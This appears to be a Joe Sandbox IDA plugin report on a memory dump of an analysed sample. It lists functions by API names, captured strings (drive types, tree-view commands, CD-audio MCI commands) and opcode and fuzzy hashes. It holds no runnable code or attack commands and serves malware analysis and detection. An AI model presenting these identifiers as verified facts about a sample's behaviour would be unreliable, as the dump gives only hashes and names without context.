                                                                          • Instruction Fuzzy Hash: 6FE0653271D6428AEB44AB65E040279E290EB98B84FD55034EA0D833A5FE7CD4918750
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                          • Instruction ID: ea03224027cbb9e3a7ac157b8b43399d96a8d1154b7d9ab6cfe8f8d4bbcf61dc
                                                                          • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                          • Instruction Fuzzy Hash: 78C01272619662DDE760DF20D8841DC3330F71031CFC01021E60A0E478EF78C249C350
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: 0
                                                                          • API String ID: 3215553584-4108050209
                                                                          • Opcode ID: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                          • Instruction ID: 524d0eb6bb41df0ccb601f53cd84fdc02ee60dec30de9d1412e0e64e8c48e4e6
                                                                          • Opcode Fuzzy Hash: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
                                                                          • Instruction Fuzzy Hash: 2C816A21A1E2034EEA69BB55824067EA3A0EF41B44FDA1931DD0D876B5FF2DE907C360
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: 0
                                                                          • API String ID: 3215553584-4108050209
                                                                          • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                          • Instruction ID: 3803436760e3572426d1198c1245c254c7ebbb093c7d62b9f82acb0607b9d4ef
                                                                          • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                                          • Instruction Fuzzy Hash: 3771E715A0E2824EEB68BB19418427DE7A1DF41B44FD60535ED08876FBFE2DF8478B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                          • Instruction ID: 2b0af7e9536181a40517cd61e10f19215cd822cee0ed5ad928cacd4d4f68b506
                                                                          • Opcode Fuzzy Hash: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                          • Instruction Fuzzy Hash: 5441B572719B448AEA48EF2AD4142A9F3A1F74CFD0B8A9036DE0D87765EE7CD546C300
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                                          • Instruction ID: dcbe81b9501a02b3db5b6b2748008bfdb3d74fe49204cb5831002be2baa459d6
                                                                          • Opcode Fuzzy Hash: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                                          • Instruction Fuzzy Hash: 0942A332B0D7428AEB10EB25D4842ADB7A1FB84798FD24135DE5D47BA9EF38E442C750
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                          • Instruction ID: 69617391b2dd25e9ace019d084e911dddb66976945158bd514021f80ace9aa17
                                                                          • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                          • Instruction Fuzzy Hash: 88423D2192EE4A8CE357AB75A815525E725FF61380FC29332E80E76671FF6CE4478620
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                          • Instruction ID: 58bf9f644e27c2b40363cbc384e09dd8187f5e483ba43542da97920cf95bcb45
                                                                          • Opcode Fuzzy Hash: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                          • Instruction Fuzzy Hash: C871FBA1B0E2524EF734A925944C7B9D2C3EF40360FD60634E66D476E5FE7DE8438620
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                          • Instruction ID: be3d90e1d27846a0cd27c1186c624af131a989a970dad2a4b32b90c6aa5c0345
                                                                          • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                          • Instruction Fuzzy Hash: 7721D433A291418AE70CCF75D462AE973D5E354708F89C13AD51B83294EE3CE906C790
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                          • Instruction ID: 8fba0b6b832352f603ff595af63501d289543d26f779f0cdac307f85b46b2986
                                                                          • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                          • Instruction Fuzzy Hash: 3EF068B1B1D6958EDBA4DF2CA442629B7D0E70C380FD08039D58D83F54DE3C9051AF14
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                          • Instruction ID: ee8a7ebeee55e1039885759cf7b80a2036511e9735bc580500f1fb0cf9739c75
                                                                          • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                          • Instruction Fuzzy Hash: BCA0012992F8029CE644BB40A850021A230EB50722BD20432D00D41571BE3CA4838220
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 3521893082-0
                                                                          • Opcode ID: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                                          • Instruction ID: 177edb1797634b55808ba6976abc1c4e207869c8fec456b57012362261b15e49
                                                                          • Opcode Fuzzy Hash: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                                          • Instruction Fuzzy Hash: BCA1B476F1E6028AEB54AB61984457DA761FB48B64FD24630CE2E13BE4EF3CD4468360
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                          • API String ID: 2907320926-4222207086
                                                                          • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                          • Instruction ID: 282e4fda5ec944b668ac384d13a1c9ed3544fe9c3742a02f850dbaa2fe8637f9
                                                                          • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                          • Instruction Fuzzy Hash: 5DB17121E1FA0298EA55BF19D85057CE361EB40B86FE65031D90E076B9FF7DE9478320
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1996641542-0
                                                                          • Opcode ID: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                                          • Instruction ID: 44c1e1b4ce843e6f0a960813b7e3d46a8708035488fbe7ab31cb9dcfe98425f1
                                                                          • Opcode Fuzzy Hash: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                                          • Instruction Fuzzy Hash: 6B71C436B1EA418AE764AB11E84463EB362FB89BA0FD14234DD5E437E4EF3CD4468750
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                          • String ID: tooltips_class32
                                                                          • API String ID: 698492251-1918224756
                                                                          • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                          • Instruction ID: d0861969a331016f74e4f474f44fd01b9fcf82965f69d3750ab0c2579443d86f
                                                                          • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                          • Instruction Fuzzy Hash: 47C16E32A19B518AEB14DF65E4442AEB7A1FB88B84FD10435EA5E47774EF3CE442CB10
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                          • String ID: @
                                                                          • API String ID: 3869813825-2766056989
                                                                          • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                          • Instruction ID: b44b34bd6487d45b05aadf2752e3efca8a58236082cd824bceeff255107263d8
                                                                          • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                          • Instruction Fuzzy Hash: 5E818132A1AA428AE750EF75D95067DB3A1FB44B88FC14531CE4E57BA8EF38D846C710
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Color$LongWindow$ModeObjectStockText
                                                                          • String ID:
                                                                          • API String ID: 554392163-0
                                                                          • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                          • Instruction ID: d0319e66db030535112073e22823d992a14e61be8508b0b1b642d25f35667d05
                                                                          • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                          • Instruction Fuzzy Hash: 7481A461D1E95689EB71A729944C279E392FF45B68FD70231C95D432F4FE3CA8838720
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                          • API String ID: 222038402-1459072770
                                                                          • Opcode ID: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                                          • Instruction ID: e79fe1bb45823e8b84f23bde8d072f908e7fdc320c104b97adc5883c722a4dc4
                                                                          • Opcode Fuzzy Hash: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                                          • Instruction Fuzzy Hash: 42517B25B0E6424AEE54FB2695112B9A391EF85FE0FC24431ED5D47BA6FE3CE5038720
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharMessageSendUpper
                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                          • API String ID: 3974292440-4258414348
                                                                          • Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                          • Instruction ID: 67dfefb109f41162846fb4b6e2d3cc9ec19d9913333c4e9afe51ad61da6fe454
                                                                          • Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                          • Instruction Fuzzy Hash: EA12D517B5EA538AEE50BB6588011BDE6A1EF54F84BC64A31DA5D477B1FE3CE4038320
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$BuffCharDriveLowerType
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 1600147383-4113822522
                                                                          Similarity
                                                                          • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                          • String ID: .dll$.exe$.icl
                                                                          • API String ID: 258715311-1154884017
                                                                          Similarity
